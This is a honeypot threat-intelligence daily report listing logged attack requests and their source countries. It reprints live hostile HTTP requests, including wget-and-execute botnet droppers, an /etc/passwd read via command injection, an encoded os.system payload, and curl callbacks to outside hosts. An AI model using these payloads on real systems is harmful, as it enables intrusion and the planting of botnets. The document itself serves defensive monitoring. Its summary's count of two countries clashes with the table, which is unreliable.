Daily Report: 2025-05-27#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).
There are 44 new requests that have never been observed before (these were added to the monitored request database.).
A total of 901 requests were recorded during the day, originating from 2 different countries, with a peak of 237 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| SG | Germany |
| ID | Germany |
| BR | Germany |
| US | Germany |
| SG | Germany |
| US | Germany |
| BR | Germany |
botnet_dropper_behaviour#
| remote_addr | request |
|---|---|
| 41.220.172.226 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.62/jaws;sh+/tmp/jaws HTTP/1.1 |
| 176.65.148.236 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
| number_of_occurence | request | |
|---|---|---|
| 26 | 4 | GET /public/css/2xcyvtr7m1fGQHcmRkDpum7Zpez.css HTTP/1.1 |
| 30 | 4 | GET /file/bcxj0I.txt HTTP/1.1 |
| 45 | 4 | GET /include/rjus.txt HTTP/1.1 |
| 48 | 4 | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Erjus.txt HTTP/1.1 |
| 51 | 4 | GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e686a65585a75545446735630746d62334232547a497a56334a335a32316b627a5a6122207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1 |
| 70 | 2 | GET /include/makecvs.php?Event=%60curl+http%3a//d0q39sn0prvpilv9a4p0jz6zhz9uszqtq.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1 |
| 72 | 2 | GET /MyAdmin/scripts/setup.php HTTP/1.1 |
| 74 | 2 | GET /include/makecvs.php?Event=%60curl+http%3a//d0q39sn0prvpilv9a4p0tiqp1ugqp5msa.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1 |
| 76 | 2 | GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0q39sn0prvpilv9a4p0iza1keo3pfgjj.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1 |
| 79 | 2 | GET /upload/userfiles/image/2xcyvtaGxB88bWp4UkDW4fLAZ7H.png HTTP/1.1 |
| 83 | 2 | GET /assets/data/usrimg/2xcyvof60o6svccutewai3ydeou.php HTTP/1.1 |
| 86 | 2 | GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0q39sn0prvpilv9a4p05hgs985z4eew4.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1 |
| 108 | 1 | GET /marketplace/api/marketplace/dashboard/recently-listed?count=14 HTTP/1.1 |
| 125 | 1 | \x00\x00\x00j\xFESMB@\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x02\x00\x03\x02\x03 |
| 127 | 1 | GET /Qqa9 HTTP/1.1 |
| 128 | 1 | GET /AOUx HTTP/1.1 |
| 129 | 1 | \x00\x0E8\xFBY}\xEB4’/\x85\x00\x00\x00\x00\x00 |
| 139 | 1 | \x00\x0E\x08\x02\xD8\x88\xB9\x83kA\xE2\x00\x00\x00\x00\x00 |
| 140 | 1 | \x00\x0E8\x02\xD8\x88\xB9\x83kA\xE2\x00\x00\x00\x00\x00 |
| 150 | 1 | GET /admin/configs.php HTTP/1.0 |
| 163 | 1 | \x00\x0E8\xA0\x84\xC4\xD4?1W\xE8\x00\x00\x00\x00\x00 |
| 200 | 1 | \x00\x0E8\x7F |
| 205 | 1 | GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1 |
| 206 | 1 | GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1 |
| 207 | 1 | GET /phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.1 |
| 209 | 1 | GET /phpMyAdmin-2.11.11.3/scripts/setup.ph HTTP/1.1 |
| 211 | 1 | GET /my/scripts/setup.php HTTP/1.1 |
| 212 | 1 | GET /PHPMYADMIN/scripts/setup.php HTTP/1.1 |
| 217 | 1 | GET /mysqladmin/scripts/setup.php HTTP/1.1 |
| 219 | 1 | GET /phpMyAdmin/scripts/setup.php HTTP/1.1 |
| 220 | 1 | GET /phpadmin/scripts/setup.php HTTP/1.1 |
| 222 | 1 | GET /sqladm/scripts/setup.php HTTP/1.1 |
| 223 | 1 | GET /sqladmin/scripts/setup.php HTTP/1.1 |
| 224 | 1 | GET /phpmyadmin/scripts/db.init.php HTTP/1.1 |
| 225 | 1 | GET /phpMyAdmin/scripts/db.init.php HTTP/1.1 |
| 226 | 1 | GET /database/scripts/setup.php HTTP/1.1 |
| 227 | 1 | GET /phpAdmin/scripts/setup.php HTTP/1.1 |
| 229 | 1 | GET /phpmyadmin2/scripts/setup.php HTTP/1.1 |
| 230 | 1 | GET /pma/scripts/setup.php HTTP/1.1 |
| 233 | 1 | \x00\x0E8Gw\x072#\xA5ai\x00\x00\x00\x00\x00 |
| 238 | 1 | \x12\x01\x00&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\xFF |
| 240 | 1 | SSH-2.0-WanScannerBot |
| 244 | 1 | \x00\x00\x00%\xFFSMBr\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
| 247 | 1 | \x01\x00\x00\x00 |
country_iso_code#
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 237 | US |
| 1 | 198 | SA |
| 2 | 103 | DE |
| 3 | 85 | PL |
| 4 | 61 | BG |
| 5 | 52 | NL |
| 6 | 21 | IN |
| 7 | 17 | CA |
| 8 | 15 | GB |
| 9 | 12 | AU |
| 10 | 12 | CZ |
| 11 | 10 | LT |
| 12 | 8 | SG |
| 13 | 7 | RU |
| 14 | 6 | BE |
| 15 | 6 | UA |
| 16 | 5 | CN |
| 17 | 4 | SC |
| 18 | 4 | VN |
| 19 | 4 | BR |
| 20 | 4 | FR |
| 21 | 4 | IL |
| 22 | 3 | CH |
| 23 | 3 | ID |
| 24 | 3 | JP |
| 25 | 3 | ES |
| 26 | 2 | SE |
| 27 | 2 | IE |
| 28 | 1 | GH |
| 29 | 1 | MZ |
| 30 | 1 | MC |
| 31 | 1 | PA |
| 32 | 1 | IR |
| 33 | 1 | RO |
| 34 | 1 | AT |
| 35 | 1 | PK |
| 36 | 1 | AO |
| 37 | 1 | KR |